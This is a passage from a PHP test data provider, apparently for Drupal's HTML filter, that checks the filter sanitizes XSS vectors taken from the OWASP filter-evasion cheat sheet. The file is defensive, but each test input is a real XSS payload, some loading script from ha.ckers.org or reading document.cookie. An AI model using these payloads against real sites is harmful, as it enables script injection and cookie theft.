    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Malformed_IMG_tags
    $data[] = ['&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;', '&lt;IMG&gt;alert(&quot;XSS&quot;)&quot;&amp;gt;'];

    // fromCharCode.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#fromCharCode
    $data[] = ['&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;', '&lt;IMG src=&quot;alert(String.fromCharCode(88,83,83))&quot;&gt;'];

    // Default SRC tag to get past filters that check SRC domain.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Default_SRC_tag_to_get_past_filters_that_check_SRC_domain
    $data[] = ['&lt;IMG SRC=# onmouseover=&quot;alert(\'xxs\')&quot;&gt;', '&lt;IMG src=&quot;#&quot;&gt;'];

    // Default SRC tag by leaving it empty.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Default_SRC_tag_by_leaving_it_empty
    $data[] = ['&lt;IMG SRC= onmouseover=&quot;alert(\'xxs\')&quot;&gt;', '&lt;IMG nmouseover=&quot;alert(&amp;#039;xxs&amp;#039;)&quot;&gt;'];

    // Default SRC tag by leaving it out entirely.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Default_SRC_tag_by_leaving_it_out_entirely
    $data[] = ['&lt;IMG onmouseover=&quot;alert(\'xxs\')&quot;&gt;', '&lt;IMG&gt;'];

    // Decimal HTML character references.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Decimal_HTML_character_references
    $data[] = ['&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;', '&lt;IMG src=&quot;alert(&amp;#039;XSS&amp;#039;)&quot;&gt;'];

    // Decimal HTML character references without trailing semicolons.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Decimal_HTML_character_references_without_trailing_semicolons
    $data[] = ['&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;', '&lt;IMG src=&quot;&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&quot;&gt;'];

    // Hexadecimal HTML character references without trailing semicolons.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Hexadecimal_HTML_character_references_without_trailing_semicolons
    $data[] = ['&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;', '&lt;IMG src=&quot;&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&quot;&gt;'];

    // Embedded tab.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_tab
    $data[] = ['&lt;IMG SRC=&quot;jav  ascript:alert(\'XSS\');&quot;&gt;', '&lt;IMG src=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;'];

    // Embedded Encoded tab.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_Encoded_tab
    $data[] = ['&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(\'XSS\');&quot;&gt;', '&lt;IMG src=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;'];

    // Embedded newline to break up XSS.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_newline_to_break_up_XSS
    $data[] = ['&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(\'XSS\');&quot;&gt;', '&lt;IMG src=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;'];

    // Embedded carriage return to break up XSS.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_carriage_return_to_break_up_XSS
    $data[] = ['&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(\'XSS\');&quot;&gt;', '&lt;IMG src=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;'];

    // Null breaks up JavaScript directive.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Null_breaks_up_JavaScript_directive
    $data[] = [&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;&quot;, '&lt;IMG&gt;'];

    // Spaces and meta chars before the JavaScript in images for XSS.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Spaces_and_meta_chars_before_the_JavaScript_in_images_for_XSS
    // @todo This dataset currently fails under 5.4 because of
    //   https://www.drupal.org/node/1210798. Restore after it's fixed.
    if (version_compare(PHP_VERSION, '5.4.0', '&lt;')) {
      $data[] = ['&lt;IMG SRC=&quot; &amp;#14;  javascript:alert(\'XSS\');&quot;&gt;', '&lt;IMG src=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;'];
    }

    // Non-alpha-non-digit XSS.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Non-alpha-non-digit_XSS
    $data[] = ['&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;', ''];
    $data[] = ['&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;', '&lt;BODY&gt;'];
    $data[] = ['&lt;SCRIPT/SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;', ''];

    // Extraneous open brackets.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Extraneous_open_brackets
    $data[] = ['&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;', '&amp;lt;alert(&quot;XSS&quot;);//&amp;lt;'];

    // No closing script tags.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#No_closing_script_tags
    $data[] = ['&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt;', ''];

    // Protocol resolution in script tags.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Protocol_resolution_in_script_tags
    $data[] = ['&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;', ''];

    // Half open HTML/JavaScript XSS vector.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Half_open_HTML.2FJavaScript_XSS_vector
    $data[] = ['&lt;IMG SRC=&quot;javascript:alert(\'XSS\')&quot;', '&lt;IMG src=&quot;alert(&amp;#039;XSS&amp;#039;)&quot;&gt;'];

    // Double open angle brackets.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Double_open_angle_brackets
    // @see http://ha.ckers.org/blog/20060611/hotbot-xss-vulnerability/ to
    // understand why this is a vulnerability.
    $data[] = ['&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;', '&lt;iframe src=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;'];

    // Escaping JavaScript escapes.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Escaping_JavaScript_escapes
    // This one is irrelevant for Drupal; we *never* output any JavaScript code
    // that depends on the URL's query string.

    // End title tag.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#End_title_tag
    $data[] = ['&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);&lt;/SCRIPT&gt;', '&lt;/TITLE&gt;alert(&quot;XSS&quot;);'];

    // INPUT image.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#INPUT_image
    $data[] = ['&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(\'XSS\');&quot;&gt;', '&lt;INPUT type=&quot;IMAGE&quot; src=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;'];

    // BODY image.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BODY_image
    $data[] = ['&lt;BODY BACKGROUND=&quot;javascript:alert(\'XSS\')&quot;&gt;', '&lt;BODY background=&quot;alert(&amp;#039;XSS&amp;#039;)&quot;&gt;'];

    // IMG Dynsrc.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_Dynsrc
    $data[] = ['&lt;IMG DYNSRC=&quot;javascript:alert(\'XSS\')&quot;&gt;', '&lt;IMG dynsrc=&quot;alert(&amp;#039;XSS&amp;#039;)&quot;&gt;'];

    // IMG lowsrc.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_lowsrc
    $data[] = ['&lt;IMG LOWSRC=&quot;javascript:alert(\'XSS\')&quot;&gt;', '&lt;IMG lowsrc=&quot;alert(&amp;#039;XSS&amp;#039;)&quot;&gt;'];

    // List-style-image.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#List-style-image
    $data[] = ['&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(\'XSS\')&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;', 'li {list-style-image: url(&quot;javascript:alert(\'XSS\')&quot;);}&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;'];

    // VBscript in an image.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#VBscript_in_an_image
    $data[] = ['&lt;IMG SRC=\'vbscript:msgbox(&quot;XSS&quot;)\'&gt;', '&lt;IMG src=\'msgbox(&amp;quot;XSS&amp;quot;)\'&gt;'];

    // Livescript (older versions of Netscape only).
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Livescript_.28older_versions_of_Netscape_only.29
    $data[] = ['&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;', '&lt;IMG src=&quot;[code]&quot;&gt;'];

    // BODY tag.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BODY_tag
    $data[] = ['&lt;BODY ONLOAD=alert(\'XSS\')&gt;', '&lt;BODY&gt;'];

    // Event handlers.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Event_Handlers
    $events = [
      'onAbort',
      'onActivate',
      'onAfterPrint',
      'onAfterUpdate',
      'onBeforeActivate',
      'onBeforeCopy',
      'onBeforeCut',
      'onBeforeDeactivate',
      'onBeforeEditFocus',
      'onBeforePaste',
      'onBeforePrint',
      'onBeforeUnload',
      'onBeforeUpdate',
      'onBegin',
      'onBlur',
      'onBounce',
      'onCellChange',
      'onChange',
      'onClick',
      'onContextMenu',
      'onControlSelect',
      'onCopy',
      'onCut',
      'onDataAvailable',
      'onDataSetChanged',
      'onDataSetComplete',
      'onDblClick',
      'onDeactivate',
      'onDrag',
      'onDragEnd',
      'onDragLeave',
      'onDragEnter',
      'onDragOver',
      'onDragDrop',
      'onDragStart',
      'onDrop',
      'onEnd',
      'onError',
      'onErrorUpdate',
      'onFilterChange',
      'onFinish',
      'onFocus',
      'onFocusIn',
      'onFocusOut',
      'onHashChange',
      'onHelp',
      'onInput',
      'onKeyDown',
      'onKeyPress',
      'onKeyUp',
      'onLayoutComplete',
      'onLoad',
      'onLoseCapture',
      'onMediaComplete',
      'onMediaError',
      'onMessage',
      'onMousedown',
      'onMouseEnter',
      'onMouseLeave',
      'onMouseMove',
      'onMouseOut',
      'onMouseOver',
      'onMouseUp',
      'onMouseWheel',
      'onMove',
      'onMoveEnd',
      'onMoveStart',
      'onOffline',
      'onOnline',
      'onOutOfSync',
      'onPaste',
      'onPause',
      'onPopState',
      'onProgress',
      'onPropertyChange',
      'onReadyStateChange',
      'onRedo',
      'onRepeat',
      'onReset',
      'onResize',
      'onResizeEnd',
      'onResizeStart',
      'onResume',
      'onReverse',
      'onRowsEnter',
      'onRowExit',
      'onRowDelete',
      'onRowInserted',
      'onScroll',
      'onSeek',
      'onSelect',
      'onSelectionChange',
      'onSelectStart',
      'onStart',
      'onStop',
      'onStorage',
      'onSyncRestored',
      'onSubmit',
      'onTimeError',
      'onTrackChange',
      'onUndo',
      'onUnload',
      'onURLFlip',
    ];
    foreach ($events as $event) {
      $data[] = ['&lt;p ' . $event . '=&quot;javascript:alert(\'XSS\');&quot;&gt;Dangerous llama!&lt;/p&gt;', '&lt;p&gt;Dangerous llama!&lt;/p&gt;'];
    }

    // BGSOUND.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BGSOUND
    $data[] = ['&lt;BGSOUND SRC=&quot;javascript:alert(\'XSS\');&quot;&gt;', '&lt;BGSOUND src=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;'];

    // &amp; JavaScript includes.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#.26_JavaScript_includes
    $data[] = ['&lt;BR SIZE=&quot;&amp;{alert(\'XSS\')}&quot;&gt;', '&lt;BR size=&quot;&quot;&gt;'];

    // STYLE sheet.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_sheet
    $data[] = ['&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(\'XSS\');&quot;&gt;', ''];

    // Remote style sheet.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet
    $data[] = ['&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;', ''];

    // Remote style sheet part 2.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_2
    $data[] = ['&lt;STYLE&gt;@import\'http://ha.ckers.org/xss.css\';&lt;/STYLE&gt;', '@import\'http://ha.ckers.org/xss.css\';'];

    // Remote style sheet part 3.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_3
    $data[] = ['&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;', '&lt;META http-equiv=&quot;Link&quot;&gt;; REL=stylesheet&quot;&amp;gt;'];

    // Remote style sheet part 4.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_4
    $data[] = ['&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;', 'BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}'];

    // STYLE tags with broken up JavaScript for XSS.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tags_with_broken_up_JavaScript_for_XSS
    $data[] = ['&lt;STYLE&gt;@im\port\'\ja\vasc\ript:alert(&quot;XSS&quot;)\';&lt;/STYLE&gt;', '@im\port\'\ja\vasc\ript:alert(&quot;XSS&quot;)\';'];

    // STYLE attribute using a comment to break up expression.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_attribute_using_a_comment_to_break_up_expression
    $data[] = ['&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(\'XSS\'))&quot;&gt;', '&lt;IMG&gt;'];

    // IMG STYLE with expression.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_STYLE_with_expression
    $data[] = [
      'exp/*&lt;A STYLE=\'no\xss:noxss(&quot;*//*&quot;);
xss:ex/*XSS*//*/*/pression(alert(&quot;XSS&quot;))\'&gt;',
      'exp/*&lt;A&gt;',
    ];

    // STYLE tag (Older versions of Netscape only).
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tag_.28Older_versions_of_Netscape_only.29
    $data[] = ['&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(\'XSS\');&lt;/STYLE&gt;', 'alert(\'XSS\');'];

    // STYLE tag using background-image.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tag_using_background-image
    $data[] = ['&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(\'XSS\')&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;', '.XSS{background-image:url(&quot;javascript:alert(\'XSS\')&quot;);}&lt;A class=&quot;XSS&quot;&gt;&lt;/A&gt;'];

    // STYLE tag using background.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tag_using_background
    $data[] = ['&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(\'XSS\')&quot;)}&lt;/STYLE&gt;', 'BODY{background:url(&quot;javascript:alert(\'XSS\')&quot;)}'];

    // Anonymous HTML with STYLE attribute.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Anonymous_HTML_with_STYLE_attribute
    $data[] = ['&lt;XSS STYLE=&quot;xss:expression(alert(\'XSS\'))&quot;&gt;', '&lt;XSS&gt;'];

    // Local htc file.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Local_htc_file
    $data[] = ['&lt;XSS STYLE=&quot;behavior: url(xss.htc);&quot;&gt;', '&lt;XSS&gt;'];

    // US-ASCII encoding.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#US-ASCII_encoding
    // This one is irrelevant for Drupal; Drupal *always* outputs UTF-8.

    // META.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#META
    $data[] = ['&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(\'XSS\');&quot;&gt;', '&lt;META http-equiv=&quot;refresh&quot; content=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;'];

    // META using data.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#META_using_data
    $data[] = ['&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;', '&lt;META http-equiv=&quot;refresh&quot; content=&quot;text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;'];

    // META with additional URL parameter
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#META
    $data[] = ['&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(\'XSS\');&quot;&gt;', '&lt;META http-equiv=&quot;refresh&quot; content=&quot;//;URL=javascript:alert(&amp;#039;XSS&amp;#039;);&quot;&gt;'];

    // IFRAME.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IFRAME
    $data[] = ['&lt;IFRAME SRC=&quot;javascript:alert(\'XSS\');&quot;&gt;&lt;/IFRAME&gt;', '&lt;IFRAME src=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;&lt;/IFRAME&gt;'];

    // IFRAME Event based.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IFRAME_Event_based
    $data[] = ['&lt;IFRAME SRC=# onmouseover=&quot;alert(document.cookie)&quot;&gt;&lt;/IFRAME&gt;', '&lt;IFRAME src=&quot;#&quot;&gt;&lt;/IFRAME&gt;'];

    // FRAME.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#FRAME
    $data[] = ['&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(\'XSS\');&quot;&gt;&lt;/FRAMESET&gt;', '&lt;FRAMESET&gt;&lt;FRAME src=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;&lt;/FRAMESET&gt;'];

    // TABLE.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#TABLE
    $data[] = ['&lt;TABLE BACKGROUND=&quot;javascript:alert(\'XSS\')&quot;&gt;', '&lt;TABLE background=&quot;alert(&amp;#039;XSS&amp;#039;)&quot;&gt;'];

    // TD.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#TD
    $data[] = ['&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(\'XSS\')&quot;&gt;', '&lt;TABLE&gt;&lt;TD background=&quot;alert(&amp;#039;XSS&amp;#039;)&quot;&gt;'];

    // DIV background-image.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_background-image
    $data[] = ['&lt;DIV STYLE=&quot;background-image: url(javascript:alert(\'XSS\'))&quot;&gt;', '&lt;DIV&gt;'];

    // DIV background-image with unicoded XSS exploit.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_background-image_with_unicoded_XSS_exploit
    $data[] = ['&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028\'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029\'\0029&quot;&gt;', '&lt;DIV&gt;'];

    // DIV background-image plus extra characters.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_background-image_plus_extra_characters
    $data[] = ['&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(\'XSS\'))&quot;&gt;', '&lt;DIV&gt;'];

    // DIV expression.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_expression
    $data[] = ['&lt;DIV STYLE=&quot;width: expression(alert(\'XSS\'));&quot;&gt;', '&lt;DIV&gt;'];

    // Downlevel-Hidden block.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Downlevel-Hidden_block
    $data[] = ['&lt;!--[if gte IE 4]&gt;
 &lt;SCRIPT&gt;alert(\'XSS\');&lt;/SCRIPT&gt;
 &lt;![endif]--&gt;',
      &quot;\n alert('XSS');\n &quot;,
    ];

    // BASE tag.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BASE_tag
    $data[] = ['&lt;BASE HREF=&quot;javascript:alert(\'XSS\');//&quot;&gt;', '&lt;BASE href=&quot;alert(&amp;#039;XSS&amp;#039;);//&quot;&gt;'];

    // OBJECT tag.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#OBJECT_tag
    $data[] = ['&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;', ''];

    // Using an EMBED tag you can embed a Flash movie that contains XSS.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Using_an_EMBED_tag_you_can_embed_a_Flash_movie_that_contains_XSS
    $data[] = ['&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;', ''];

    // You can EMBED SVG which can contain your XSS vector.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#You_can_EMBED_SVG_which_can_contain_your_XSS_vector
    // cspell:disable-next-line
    $data[] = ['&lt;EMBED SRC=&quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&quot; type=&quot;image/svg+xml&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;', ''];

    // XML data island with CDATA obfuscation.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#XML_data_island_with_CDATA_obfuscation
    $data[] = ['&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(\'XSS\')&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=&quot;#xss&quot; DATAFLD=&quot;B&quot; DATAFORMATAS=&quot;HTML&quot;&gt;&lt;/SPAN&gt;', '&lt;XML id=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG&gt;cript:alert(\'XSS\')&quot;&amp;gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN datasrc=&quot;#xss&quot; datafld=&quot;B&quot; dataformatas=&quot;HTML&quot;&gt;&lt;/SPAN&gt;'];

    // Locally hosted XML with embedded JavaScript that is generated using an XML data island.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Locally_hosted_XML_with_embedded_JavaScript_that_is_generated_using_an_XML_data_island
    // This one is irrelevant for Drupal; Drupal disallows XML uploads by
    // default.

    // HTML+TIME in XML.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#HTML.2BTIME_in_XML
    $data[] = ['&lt;?xml:namespace prefix=&quot;t&quot; ns=&quot;urn:schemas-microsoft-com:time&quot;&gt;&lt;?import namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&gt;&lt;t:set attributeName=&quot;innerHTML&quot; to=&quot;XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;', '&amp;lt;?xml:namespace prefix=&quot;t&quot; ns=&quot;urn:schemas-microsoft-com:time&quot;&amp;gt;&amp;lt;?import namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&amp;gt;&lt;t set attributename=&quot;innerHTML&quot;&gt;alert(&quot;XSS&quot;)&quot;&amp;gt;'];

    // Assuming you can only fit in a few characters and it filters against &quot;.js&quot;.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Assuming_you_can_only_fit_in_a_few_characters_and_it_filters_against_.22.js.22
    $data[] = ['&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;', ''];

    // IMG Embedded commands.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_Embedded_commands
    // This one is irrelevant for Drupal; this is actually a CSRF, for which
    // Drupal has CSRF protection. See https://www.drupal.org/node/178896.

    // Cookie manipulation.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Cookie_manipulation
    $data[] = ['&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(\'XSS\')&lt;/SCRIPT&gt;&quot;&gt;', '&lt;META http-equiv=&quot;Set-Cookie&quot;&gt;alert(\'XSS\')&quot;&amp;gt;'];

    // UTF-7 encoding.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#UTF-7_encoding
    // This one is irrelevant for Drupal; Drupal *always* outputs UTF-8.

    // XSS using HTML quote encapsulation.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#XSS_using_HTML_quote_encapsulation
    $data[] = ['&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;', '&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&amp;gt;'];
